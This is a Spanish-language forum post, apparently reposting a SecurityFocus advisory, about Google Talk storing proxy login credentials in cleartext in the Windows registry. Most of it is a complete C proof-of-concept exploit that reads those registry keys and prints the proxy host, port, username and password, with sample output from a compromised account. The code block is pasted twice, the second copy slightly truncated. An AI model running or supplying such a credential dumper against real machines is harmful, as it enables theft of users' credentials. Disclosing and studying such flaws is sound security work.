Autor
Google talk no parece hacer un buen trabajo en almacenar las credenciales de la conexión de gmail en el registro. Éstas son las credenciales necesitadas para establecer una conexión a talk.google.com y se localizan en:
HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[username]@gmail.com\pw
En este caso la contraseña parece ser cifrada.Sin embargo, los programadores de Google talk parecen haberse olvidado de utilizar cualquier mecanismo de encryption cuando cuando se guardan las credenciales para la conexión. En este caso, todas las credenciales del usuario (username y contraseña) se almacenan como * cleartext * en el registro de Windows.
Tales credenciales se localizan en:
HKEY_CURRENT_USER\Software\Google\Google Talk\Options\auth_user HKEY_CURRENT_USER\Software\Google\Google Talk\Options\auth_pass
Para explotar esta vulnerabilidad se deben dar tres requisitos:
a)Que la victima se conecte por proxy al usar google talk
b)Que el proxy requiera login credentials (username/password)
c)Que el atacante haya comprometido la cuenta del usuario victima
Prueba de Concepto:
Código:
#include <windows.h>
#include <stdio.h>
#include <string.h>
#define TITLE "\nGoogle Talk cleartext proxy credentials PoC exploit\n"
/*
Author: pagvac (Adrian Pastor)
Date found: 12th Oct, 2005
Filename: google-talk-dump-proxy-credentials.c
Example of usage:
C:\>runas /user:compromised-account cmd.exe
Enter the password for compromised-account: [password entered]
Attempting to start cmd.exe as user "target-host\compromised-account" ...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>e:
E:\>cd "my exploits"
E:\my exploits>google-talk-dump-proxy-credentials.exe
Proxy host: 192.168.1.10
Port number: 8080
Username: compromised_username
Password: compromised_password
*/
BOOL googleTalkIsInstalled(void)
{
HKEY hKey;
LONG returnStatus;
returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Google\\Google Talk", 0L, KEY_READ, &hKey);
if (returnStatus == ERROR_SUCCESS)
{
RegCloseKey(hKey);
return TRUE;
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
BOOL QueryStrVal(char lszVal2Query[255], char lszValData[255])
{
char lszResult[255];
HKEY hKey;
LONG returnStatus;
DWORD dwType=REG_SZ;
DWORD dwSize=255;
returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Google\\Google Talk\\Options", 0L, KEY_READ, &hKey);
if (returnStatus == ERROR_SUCCESS)
{
returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize);
if (returnStatus == ERROR_SUCCESS)
{
strcpy(lszValData, lszResult);
RegCloseKey(hKey);
return TRUE;
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
BOOL QueryDwordVal(char lszVal2Query[255], DWORD *dwVal)
{
DWORD dwResult;
HKEY hKey;
LONG returnStatus;
DWORD dwType=REG_DWORD;
DWORD dwSize=sizeof(DWORD);
returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Google\\Google Talk\\Options", 0L, KEY_READ, &hKey);
if (returnStatus == ERROR_SUCCESS)
{
returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&dwResult, &dwSize);
if (returnStatus == ERROR_SUCCESS)
{
*dwVal=dwResult;
RegCloseKey(hKey);
return TRUE;
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
int main(void)
{
char lszData[255];
DWORD dwData;
printf(TITLE);
printf("By pagvac (Adrian Pastor)\n");
printf("www.ikwt.com (In Knowledge We Trust)\n\n");
// Google Talk *is* installed
if(googleTalkIsInstalled())
{
// No proxy settings are present
if(!QueryStrVal("proxy_host", lszData))
{
printf("No proxy settings were found!\n");
printf("Probably Google Talk is connecting *directly* to the Internet...\n");
return 0;
}
// Proxy settings were configured
else
{
printf("Proxy host:\t%s\n", lszData);
// Print port number
if(!QueryDwordVal("proxy_port", &dwData))
printf("Port number:\t%d\n", 1080); // by default port 1080 is used for proxy
else
printf("Port number:\t%d\n", dwData);
// Print username
if(!QueryStrVal("auth_user", lszData))
printf("(no username required)\n");
else
{
if(strlen(lszData)==0)
printf("(no username required)\n");
else
printf("Username:\t%s\n", lszData);
}
// Print password
if(!QueryStrVal("auth_pass", lszData))
printf("(no password required)\n");
else
{
if(strlen(lszData)==0)
printf("(no password required)\n");
else
printf("Password:\t%s\n", lszData);
}
}
}
//Google Talk is *not* installed
else
{
printf("Google Talk does *not* seem to be installed for the current user\n");
}
return 0;
}
#include <stdio.h>
#include <string.h>
#define TITLE "\nGoogle Talk cleartext proxy credentials PoC exploit\n"
/*
Author: pagvac (Adrian Pastor)
Date found: 12th Oct, 2005
Filename: google-talk-dump-proxy-credentials.c
Example of usage:
C:\>runas /user:compromised-account cmd.exe
Enter the password for compromised-account: [password entered]
Attempting to start cmd.exe as user "target-host\compromised-account" ...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>e:
E:\>cd "my exploits"
E:\my exploits>google-talk-dump-proxy-credentials.exe
Proxy host: 192.168.1.10
Port number: 8080
Username: compromised_username
Password: compromised_password
*/
BOOL googleTalkIsInstalled(void)
{
HKEY hKey;
LONG returnStatus;
returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Google\\Google Talk", 0L, KEY_READ, &hKey);
if (returnStatus == ERROR_SUCCESS)
{
RegCloseKey(hKey);
return TRUE;
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
BOOL QueryStrVal(char lszVal2Query[255], char lszValData[255])
{
char lszResult[255];
HKEY hKey;
LONG returnStatus;
DWORD dwType=REG_SZ;
DWORD dwSize=255;
returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Google\\Google Talk\\Options", 0L, KEY_READ, &hKey);
if (returnStatus == ERROR_SUCCESS)
{
returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize);
if (returnStatus == ERROR_SUCCESS)
{
strcpy(lszValData, lszResult);
RegCloseKey(hKey);
return TRUE;
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
BOOL QueryDwordVal(char lszVal2Query[255], DWORD *dwVal)
{
DWORD dwResult;
HKEY hKey;
LONG returnStatus;
DWORD dwType=REG_DWORD;
DWORD dwSize=sizeof(DWORD);
returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Google\\Google Talk\\Options", 0L, KEY_READ, &hKey);
if (returnStatus == ERROR_SUCCESS)
{
returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&dwResult, &dwSize);
if (returnStatus == ERROR_SUCCESS)
{
*dwVal=dwResult;
RegCloseKey(hKey);
return TRUE;
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
int main(void)
{
char lszData[255];
DWORD dwData;
printf(TITLE);
printf("By pagvac (Adrian Pastor)\n");
printf("www.ikwt.com (In Knowledge We Trust)\n\n");
// Google Talk *is* installed
if(googleTalkIsInstalled())
{
// No proxy settings are present
if(!QueryStrVal("proxy_host", lszData))
{
printf("No proxy settings were found!\n");
printf("Probably Google Talk is connecting *directly* to the Internet...\n");
return 0;
}
// Proxy settings were configured
else
{
printf("Proxy host:\t%s\n", lszData);
// Print port number
if(!QueryDwordVal("proxy_port", &dwData))
printf("Port number:\t%d\n", 1080); // by default port 1080 is used for proxy
else
printf("Port number:\t%d\n", dwData);
// Print username
if(!QueryStrVal("auth_user", lszData))
printf("(no username required)\n");
else
{
if(strlen(lszData)==0)
printf("(no username required)\n");
else
printf("Username:\t%s\n", lszData);
}
// Print password
if(!QueryStrVal("auth_pass", lszData))
printf("(no password required)\n");
else
{
if(strlen(lszData)==0)
printf("(no password required)\n");
else
printf("Password:\t%s\n", lszData);
}
}
}
//Google Talk is *not* installed
else
{
printf("Google Talk does *not* seem to be installed for the current user\n");
}
return 0;
}
Fuente:securityfocus
Salu2
En línea
